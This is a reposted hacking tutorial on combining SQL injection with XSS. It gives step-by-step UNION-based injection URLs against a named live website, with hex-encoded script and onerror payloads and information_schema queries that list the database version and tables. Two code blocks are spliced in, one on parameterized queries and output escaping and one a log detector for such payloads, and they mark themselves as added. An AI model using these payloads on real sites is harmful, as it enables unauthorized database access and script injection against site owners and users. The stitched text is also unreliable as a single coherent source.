XSS with SQL Injection

Author: w_w_wei | Published: 2018-08-07 09:56 | Views: 0

In the previous tutorial, Ultimate Guide to XSS (Cross Site Scripting), we covered the basics of XSS (Cross Site Scripting) and using its payloads on our target sites. In this tutorial you will learn the XSS attack via SQL injection.
If you are new to XSS, I suggest you first read the basics in the previous tutorial to learn how it works and what an attacker can do with an XSS vulnerability. Once you have basic knowledge of the XSS attack, you will be better able to understand this tutorial, "XSS with SQL Injection".

When we try to exploit a website through an XSS attack, we mostly check an "input area" such as a "search box" or a **"login area"**. But we can do the same via SQL injection on that target site.

In an XSS attack via SQL injection, we execute our XSS payloads in a UNION-based query.

For example:
We have found a website that is vulnerable to SQL injection and can inject into the database. There we can also execute our XSS payloads in our UNION-based query. Let's take a site for practice.
Here is the target site:
http://www.smelisting.net/corner_category.php?id=7

If we add a single quote at the end of the parameter, it gives a **MySQL error**:

"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''7'' order by id desc' at line 1"

After counting the columns, we find there are 5 columns in total. So let's prepare our UNION-based query and execute it.

http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,3,4,5--+

The 3rd column is printed on the page as output, so we will execute our XSS payload in that column.

Here is the XSS payload that we are going to inject into the **UNION-based** query:

XSS PAYLOAD : <script>alert('XSS');</script>

Before executing this payload we need to encode it as a hex value.
Here is the hex value of our payload, with 0x added at the start.

HEX VALUE:0x3c7363726970743e616c657274282758535327293b3c2f7363726970743e

Let's insert this payload into our UNION-based query and execute the query:

http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,0x3c7363726970743e616c657274282758535327293b3c2f7363726970743e,4,5--+

This payload displays an XSS pop-up alert. This is the basic XSS payload; you can try more payloads, which were posted in this tutorial.
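The pop-up above needs two separate flaws in the page: the `id` parameter is concatenated into the SQL text, and column 3 is written into the HTML without output encoding. The following is an added example, not code from the original tutorial or the target site, showing that pattern beside a hardened form; SQLite stands in for MySQL, the table and function names are hypothetical, and the payload is passed as a string literal because SQLite has no `0x` string literals.

```python
import html
import sqlite3

def make_db():
    # Constructed five-column table standing in for the one behind corner_category.php.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE corner (id INTEGER, a TEXT, title TEXT, b TEXT, c TEXT)")
    db.execute("INSERT INTO corner VALUES (7, 'x', 'Seven & Co', 'y', 'z')")
    return db

def render_vulnerable(db, raw_id):
    # Flaw 1: the request parameter becomes part of the SQL statement itself.
    sql = "SELECT * FROM corner WHERE id='" + raw_id + "' ORDER BY id DESC"
    rows = db.execute(sql).fetchall()
    # Flaw 2: column 3 is placed in the page without HTML encoding.
    return "".join("<td>%s</td>" % r[2] for r in rows)

def render_hardened(db, raw_id):
    # Fix 1: bound parameter; the value can no longer change the statement.
    rows = db.execute(
        "SELECT * FROM corner WHERE id=? ORDER BY id DESC", (raw_id,)
    ).fetchall()
    # Fix 2: encode on output, even for values that came from the database.
    return "".join("<td>%s</td>" % html.escape(str(r[2]), quote=True) for r in rows)

# The tutorial's request shape, adapted to SQLite (constructed input).
INJECTED = "-7' UNION SELECT 1,2,'<script>alert(''XSS'');</script>',4,5-- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", render_vulnerable(db, INJECTED))
    print("hardened  :", repr(render_hardened(db, INJECTED)))
    print("normal    :", render_hardened(db, "7"))
```

Either fix alone breaks this chain, but both are needed: the bound parameter stops the UNION row from being injected, and output encoding covers markup that reaches the column by any other route.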

Manipulating SQL Injection Queries in XSS Payload

Going further, we can also show the results of our SQLi queries in an XSS pop-up alert. We insert our SQLi queries into the XSS payload so that their output is shown in a pop-up.
First, let's say we want to show the current version of the target site in an XSS pop-up. See the example:

Our XSS payload for showing the version in a pop-up:

<img src=x onerror="javascript:alert('Your_name:Version:,version(),0x')">

The red highlighted text is our SQLi query, the blue text is the injector name, the green text is what we have put for our variable, and the rest is our XSS payload.
Before executing our query we need to encode our XSS payload as a hex value.

Hex value of the XSS payload:
0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827524169204a65657e3a56657273696f6e3a,version(),0x30782729223e

Let's insert our XSS payload into the vulnerable column to show the pop-up with the current version.

http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827524169204a65657e3a56657273696f6e3a,version(),0x30782729223e),4,5--+

Let's execute our payload:

And here we got the current version in an XSS pop-up. We can do the same for the current database and user.
After popping up the **version**, the next part is to show the tables in an XSS pop-up alert. So we have to insert our query into the XSS payload to display them in the XSS alert.
Here is our DIOS query for getting the tables from the current database:

(select group_concat(table_name) from information_schema.tables where table_Schema=database())

Let's add this **DIOS** query to our XSS payload.

http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827524169204a65657e3a56657273696f6e3a,version(),(select group_concat(table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5--+

Now execute this query and check the output response.

We got the tables from the current database. But if we go further and add HTML tags such as **<BR>** to start each table on a new line, that HTML doesn't work here.
In XSS we use **"\n"**, which shows each result on a new line. So we will add this part to our **DIOS query** to show each table on a new line in our XSS pop-up.

We need to first encode it as a hex value and then insert it into the DIOS query.

HEX value of \n: 0x5c6e

Let's add it to our XSS payload:
http://www.smelisting.net/corner_category.php?id=-7' UNION SELECT 1,2,concat(0x3c696d67207372633d78206f6e6572726f723d226a6176617363726970743a616c6572742827524169204a65657e3a56657273696f6e3a,version(),(select group_concat(0x5c6e,table_name) from information_schema.tables where table_Schema=database()),0x30782729223e),4,5--+

And here we can see that each table starts on a new line in the XSS pop-up alert box. We can do the same for columns by adding that part to our DIOS query. I leave that part for you guys.

AUTHOR: Rai Muzammal Hussain a.k.a. RAi Jee
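Because every payload in this tutorial is wrapped in a `0x` hex literal, a plain-text search of access logs for `<script` or `onerror` misses these requests. The following is an added example, not part of the original tutorial: it decodes hex literals in a query string before matching, and flags UNION SELECT and `information_schema` use. The function names, finding labels and sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
MARKUP = re.compile(r"<\s*(?:script|img|svg|iframe)\b|\bon\w+\s*=|javascript:", re.I)

def decode_hex_literals(query):
    """Decode every MySQL-style 0x... literal to text, as the server would."""
    return [bytes.fromhex(m.group(1)).decode("latin-1")
            for m in HEX_LITERAL.finditer(query)]

def inspect(query_string):
    """Return the findings for one raw (still URL-encoded) query string."""
    q = unquote_plus(query_string)
    findings = []
    if UNION_SELECT.search(q):
        findings.append("union-select")
    # Match markup only in the decoded literals, where the payload is hidden.
    if any(MARKUP.search(text) for text in decode_hex_literals(q)):
        findings.append("hex-encoded-markup")
    if "information_schema" in q.lower():
        findings.append("schema-enumeration")
    return findings

# Constructed query strings: two benign, two shaped like the tutorial's requests.
SAMPLES = [
    "id=7",
    "id=7&color=0xff00ff",
    "id=-7' UNION SELECT 1,2,"
    "0x3c7363726970743e616c657274282758535327293b3c2f7363726970743e,4,5--+",
    "id=-7%27%20UNION%20SELECT%201,2,(select%20group_concat(0x5c6e,table_name)"
    "%20from%20information_schema.tables%20where%20table_Schema=database()),4,5--+",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect(sample), sample[:60])
```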

Link to this article: https://www.haomeiwen.com/subject/gofjvftx.html